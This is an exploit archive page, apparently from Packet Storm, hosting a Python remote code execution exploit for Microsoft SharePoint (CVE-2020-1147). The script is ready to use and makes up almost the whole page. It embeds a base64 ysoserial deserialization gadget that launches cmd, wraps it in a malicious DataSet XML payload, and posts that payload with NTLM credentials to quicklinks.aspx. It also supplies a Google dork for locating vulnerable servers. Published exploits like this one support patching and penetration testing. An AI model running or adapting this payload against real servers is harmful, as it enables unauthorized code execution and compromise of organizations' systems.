what you don't know can hurt you

Microsoft SharePoint Server 2019 Remote Code Execution

Microsoft SharePoint Server 2019 Remote Code Execution
Posted Jul 23, 2021
Authored by Soroush Dalili, West Shepherd, Steven Seele

Microsoft SharePoint Server 2019 remote code execution exploit.

tags | exploit, remote, code execution
advisories | CVE-2020-1147
MD5 | d28db781523b61191a7e8e9b07815d64

Microsoft SharePoint Server 2019 Remote Code Execution

Change Mirror Download
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
from urllib import quote, unquote
import logging


class Exploit(object):
# To generate the gadget use:
# ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
# ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='
control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
control_path = control_path_quicklinks

def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
self.username = '%s\\%s' % (domain, username)
self.target = target
self.password = password
self.session = requests.session()
self.redirect = redirect
self.timeout = 0.5
self.proxies = {
'http': 'http://%s' % proxy_address,
'https': 'http://%s' % proxy_address
} \
if proxy_address is not None \
and proxy_address != '' else {}
self.headers = {}
self.query_params = {
'Mode': "Suggestion"
}
self.form_values = {
'__viewstate': '',
'__SUGGESTIONSCACHE__': ''
}
self.cookies = {}
self.payload = """\
<DataSet>
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
<xs:element name="somedataset" msdata:IsDataSet="true"
msdata:UseCurrentLocale="true">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:element name="Exp_x0020_Table">
<xs:complexType>
<xs:sequence>
<xs:element name="pwn"
msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter,
System.Web, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider,
PresentationFramework, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=31bf3856ad364e35]], System.Data.Services,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
type="xs:anyType" minOccurs="0"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:choice>
</xs:complexType>
</xs:element>
</xs:schema>
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"
xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
<somedataset>
<Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0"
diffgr:hasChanges="inserted">
<pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Deserialize</MethodName>
<MethodParameters>
<anyType
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xsi:type="xsd:string">{GADGET}</anyType>
</MethodParameters>
<ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
</ProjectedProperty0>
</pwn>
</Exp_x0020_Table>
</somedataset>
</diffgr:diffgram>
</DataSet>""".replace('{GADGET}', self.gadget)

def do_get(self, url, params=None, data=None):
return self.session.get(
url=url,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
data=data,
params=params,
auth=HttpNtlmAuth(self.username, self.password)
)

def do_post(self, url, data=None, params=None):
return self.session.post(
url=url,
data=data,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
params=params,
auth=HttpNtlmAuth(self.username, self.password)
)

def parse_page(self, content):
soup = BeautifulSoup(content, 'lxml')
for key, val in self.form_values.iteritems():
try:
for tag in soup.select('input[name=%s]' % key):
try:
self.form_values[key] = tag['value']
except Exception as error:
stderr.write('error for key %s error %s\n' % (key, str(error)))
except Exception as error:
stderr.write('error for selector %s error %s\n' % (key, str(error)))
return self

def debug(self):
try:
import http.client as http_client
except ImportError:
import httplib as http_client
http_client.HTTPConnection.debuglevel = 1
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
return self

def clean(self, payload):
payload = payload.replace('\n', '').replace('\r', '')
while ' ' in payload:
payload = payload.replace(' ', ' ')
return payload

def get_form(self):
url = '%s%s' % (self.target, self.control_path)
resp = self.do_get(url=url, params=self.query_params)
self.parse_page(content=resp.content)
return resp

def send_payload(self):
url = '%s%s' % (self.target, self.control_path)
# self.get_form()
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
self.form_values['__viewstate'] = ''
resp = self.do_post(url=url, params=self.query_params, data=self.form_values)
return resp


if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')
try:
parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ')
parser.add_argument("-username", action='store', default='', help='Username to use: first.last')
parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local')
parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020')
parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False')
parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080')

if len(argv) == 1:
parser.print_help()
exit(1)
options = parser.parse_args()

exp = Exploit(
proxy_address=options.proxy,
username=options.username,
domain=options.domain,
password=options.password,
target=options.target
)

if options.debug:
exp.debug()
stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
options.target, options.username, options.domain, options.password, options.debug, options.proxy
))

result = exp.send_payload()
stdout.write('Response: %d\n' % result.status_code)
if 'MicrosoftSharePointTeamServices' in result.headers:
stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices'])
if options.both and result.status_code != 200:
exp.control_path = exp.control_path_quicklinksdialogform
stdout.write('Trying alternate page\n')
result = exp.send_payload()
stdout.write('Response: %d\n' % result.status_code)

except Exception as error:
stderr.write('error in main %s' % str(error))

Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close